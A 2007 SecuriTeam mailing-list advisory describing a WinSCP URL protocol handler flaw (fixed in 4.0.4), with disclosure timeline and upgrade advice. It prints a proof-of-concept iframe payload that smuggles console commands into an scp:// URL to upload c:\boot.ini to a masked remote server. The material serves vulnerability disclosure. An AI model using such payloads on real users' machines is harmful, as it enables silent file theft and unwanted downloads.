[NT] WinSCP URL Protocol Handler Flaw
- From: SecuriTeam <support@xxxxxxxxxxxxxx>
- Date: 16 Sep 2007 15:06:40 +0200
The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com
- - promotion
The SecuriTeam alerts list - Free, Accurate, Independent.
Get your security news from a reliable source.
http://www.securiteam.com/mailinglist.html
- - - - - - - - -
WinSCP URL Protocol Handler Flaw
------------------------------------------------------------------------
SUMMARY
By default WinSCP installs URL protocol handlers for the scp:// and
sftp:// protocols. These could be used by malicious web content to
automatically upload any file from the local system to a remote server, or
automatically download files from a remote server to the local system.
Since version 3.8.2 there is a sort of protection against this, but this
does not stop all forms of attack.
DETAILS
Vulnerable Systems:
* WinSCP version 4.0.3
Immune Systems:
* WinSCP version 4.0.4
On a machine you control set up an scp-only account with the username
"scp" with any password. Place this on a website: <iframe
src='scp:password@xxxxxxxxxxxx:" /console /command "option confirm off"
"put c:\boot.ini" close exit "'/>
This will upload a file to the server when the page is visited by a user
with a vulnerable WinSCP installed.
Downloading a file from the server to any location writable by the current
user also works.
Solution:
Upgrade to version 4.04 or higher from <http://winscp.net/download.php>
http://winscp.net/download.php
Disclosure Timeline
24-Jul-2007 Vulnerability reported to Martin Prikryl
25-07-2007 Proposed fix to Martin
31-07-2007 Response from Martin
01-09-2007 Martin confirms fix
02-09-2007 New version done
06-09-2007 WinSCP v4.04 released
ADDITIONAL INFORMATION
The information has been provided by <mailto:Kender.Security@xxxxxxxxx>
Kender.Security.
========================================
This bulletin is sent to members of the SecuriTeam mailing list.
To unsubscribe from the list, send mail with an empty subject line and body to: list-unsubscribe@xxxxxxxxxxxxxx
In order to subscribe to the mailing list, simply forward this email to: list-subscribe@xxxxxxxxxxxxxx
====================
====================
DISCLAIMER:
The information in this bulletin is provided "AS IS" without warranty of any kind.
In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages.
- Prev by Date: [UNIX] Multiple Kerberos Implementations Authentication Context Stack Overflow Vulnerability
- Next by Date: [NEWS] GCALDaemon DoS
- Previous by thread: [UNIX] Multiple Kerberos Implementations Authentication Context Stack Overflow Vulnerability
- Next by thread: [NEWS] GCALDaemon DoS
- Index(es):
Relevant Pages
|
|
